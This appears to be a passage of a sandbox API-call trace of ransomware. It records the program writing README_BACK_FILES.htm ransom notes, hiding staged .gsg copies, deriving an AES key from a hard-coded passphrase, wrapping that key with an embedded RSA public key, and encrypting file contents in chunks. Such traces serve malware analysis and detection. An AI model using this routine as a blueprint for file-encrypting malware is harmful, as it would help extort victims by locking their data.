(lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\adm\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0271.632] GetFileType (hFile=0x5d48) returned 0x1 [0271.632] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0271.633] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0271.633] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\af\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa208 [0271.634] FindNextFileA (in: hFindFile=0x2fa208, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0271.634] FindNextFileA (in: hFindFile=0x2fa208, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0271.634] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0271.635] GetLastError () returned 0x0 [0271.635] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\af\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\af\\filesync.localizedresources.dll.mui")) returned 0x20 [0271.635] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\af\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0271.635] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\af\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\af\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0271.636] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\af\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\af\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0271.637] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\af\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0271.637] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f27f68) returned 1 [0271.640] CryptCreateHash (in: hProv=0x2f27f68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0271.640] lstrlenA (lpString="gRZNKRGLTXaVulDshFSSTuldzMlQm") returned 29 [0271.640] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb2b0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0271.640] CryptDeriveKey (in: hProv=0x2f27f68, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fa4c8) returned 1 [0271.640] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0271.640] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0271.640] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f286d8) returned 1 [0271.641] CryptImportPublicKeyInfo (in: hCryptProv=0x2f286d8, dwCertEncodingType=0x1, pInfo=0x2f329e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f32a10*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f32a18*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fac88) returned 1 [0271.641] CryptEncrypt (in: hKey=0x2fac88, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0271.641] CryptEncrypt (in: hKey=0x2fac88, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f283a8*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f283a8*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0271.641] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f283a8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f283a8*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0271.642] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.654] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.654] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.655] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.655] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.655] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.655] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.655] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.655] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.656] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.656] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.656] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.656] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.672] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.672] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.672] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.673] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.673] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.673] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.673] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.673] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.673] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.673] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.673] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.673] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.673] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.673] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.673] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.673] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.673] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.674] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.674] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.674] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.674] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.674] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.674] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.674] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.675] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.675] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.675] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.675] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.675] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.675] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.675] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.675] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.675] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.675] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.675] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.675] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.676] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.676] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.676] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.676] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.676] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.676] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.676] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.676] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.676] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.676] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.676] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.677] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.677] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.677] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.677] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.677] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.677] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.677] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.677] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.677] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.677] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.677] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.677] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.678] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.678] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.678] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.678] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.678] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.678] WriteFile (in: hFile=0x5d3c, 